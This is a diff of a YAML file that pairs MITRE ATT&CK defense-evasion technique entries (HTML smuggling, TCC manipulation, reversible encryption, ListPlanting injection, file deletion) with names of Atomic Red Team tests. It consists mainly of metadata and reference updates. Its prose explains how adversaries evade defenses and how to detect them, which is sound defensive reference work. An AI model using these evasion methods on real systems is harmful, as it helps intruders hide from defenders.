+        url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+      - source_name: Invictus IR Cloud Ransomware 2024
+        description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+          August 5, 2024.
+        url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+      - source_name: Huntress MOVEit 2023
+        description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+          CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+        url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+      - source_name: Aquasec Kubernetes Attack 2023
+        description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+          Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+          2023.
+        url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.001:
+    technique:
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -15606,6 +15908,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -15620,22 +15923,42 @@ defense-evasion:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.006:
     technique:
-      modified: '2023-07-14T14:01:41.475Z'
+      modified: '2024-09-12T19:12:13.006Z'
       name: HTML Smuggling
       description: |-
         Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
@@ -15693,48 +16016,17 @@ defense-evasion:
         url: https://www.menlosecurity.com/blog/new-attack-alert-duri
       - source_name: nccgroup Smuggling HTA 2017
         description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
-          Explorer/Edge. Retrieved May 20, 2021.
-        url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+          Explorer/Edge. Retrieved September 12, 2024.
+        url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.006
     atomic_tests: []
   T1556.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
-      type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -15756,6 +16048,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -15766,23 +16059,50 @@ defense-evasion:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:43:18.873Z'
       name: Command Obfuscation
       description: |-
         Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
@@ -15823,8 +16143,9 @@ defense-evasion:
         url: https://attack.mitre.org/techniques/T1027/010
         external_id: T1027.010
       - source_name: Twitter Richard WMIC
-        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
-        url: https://twitter.com/rfackroyd/status/1639136000755765254
+        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+          2024.
+        url: https://x.com/rfackroyd/status/1639136000755765254
       - source_name: Invoke-Obfuscation
         description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
           March 17, 2023.
@@ -15860,43 +16181,23 @@ defense-evasion:
         url: https://redcanary.com/threat-detection-report/techniques/powershell/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1070.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Walker Johnson
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
-      created: '2020-01-31T12:35:36.479Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.004
-        url: https://attack.mitre.org/techniques/T1070/004
-      - source_name: Microsoft SDelete July 2016
-        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
-        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
-          8, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:33:59.107Z'
+      name: 'Indicator Removal on Host: File Deletion'
       description: |-
         Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
 
         There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Indicator Removal on Host: File Deletion'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Walker Johnson
+      x_mitre_deprecated: false
       x_mitre_detection: It may be uncommon for events related to benign command-line
         functions such as DEL or third-party utilities or tools to be found in an
         environment, depending on the user base and how systems are typically used.
@@ -15907,18 +16208,36 @@ defense-evasion:
         network that an adversary could introduce. Some monitoring tools may collect
         command-line arguments, but may not capture DEL commands since DEL is a native
         function within cmd.exe.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Deletion'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+      created: '2020-01-31T12:35:36.479Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/004
+        external_id: T1070.004
+      - source_name: Microsoft SDelete July 2016
+        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+          8, 2018.
+        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.004
     atomic_tests:
     - name: Delete a single file - FreeBSD/Linux/macOS
@@ -16090,7 +16409,7 @@ defense-evasion:
         description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
           2018.
         source_name: ryhanson phishery SEPT 2016
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-12T18:16:56.176Z'
       name: Template Injection
       description: |-
         Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
@@ -16120,13 +16439,11 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1221
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -16223,7 +16540,6 @@ defense-evasion:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1027.002:
     technique:
@@ -16286,7 +16602,6 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1027.002
     atomic_tests:
     - name: Binary simply packed by UPX (linux)
@@ -16366,7 +16681,7 @@ defense-evasion:
         description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
           Equation Group: Questions and Answers. Retrieved December 21, 2015.'
         url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-29T15:12:11.024Z'
       name: Hidden File System
       description: |-
         Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -16393,8 +16708,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1055.005:
     technique:
@@ -16422,7 +16735,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -16466,8 +16779,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1622:
     technique:
@@ -16522,7 +16833,7 @@ defense-evasion:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -16542,7 +16853,6 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1036.006:
@@ -16592,7 +16902,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1036.006
     atomic_tests:
     - name: Space After Filename
@@ -16665,12 +16974,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -16720,12 +17028,11 @@ defense-evasion:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1216.002:
     technique:
-      modified: '2024-04-18T23:51:40.464Z'
+      modified: '2024-09-12T19:42:21.547Z'
       name: SyncAppvPublishingServer
       description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
         of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -16785,8 +17092,8 @@ defense-evasion:
       - source_name: 7 - appv
         description: Nick Landers. (2017, August 8). Need a signed alternative to
           Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
-          Retrieved February 6, 2024.
-        url: https://twitter.com/monoxgas/status/895045566090010624
+          Retrieved September 12, 2024.
+        url: https://x.com/monoxgas/status/895045566090010624
       - source_name: 3 - appv
         description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
           Evasion (T1202). Retrieved February 6, 2024.'
@@ -16803,37 +17110,18 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -16841,6 +17129,8 @@ defense-evasion:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -16848,7 +17138,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -16878,7 +17168,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -16924,7 +17213,7 @@ defense-evasion:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -16969,8 +17258,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.007:
     technique:
@@ -17015,7 +17302,7 @@ defense-evasion:
         To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
 
         Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-08-23T18:32:46.899Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Obfuscated Files or Information: Dynamic API Resolution'
       x_mitre_detection: ''
@@ -17029,58 +17316,28 @@ defense-evasion:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.007
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
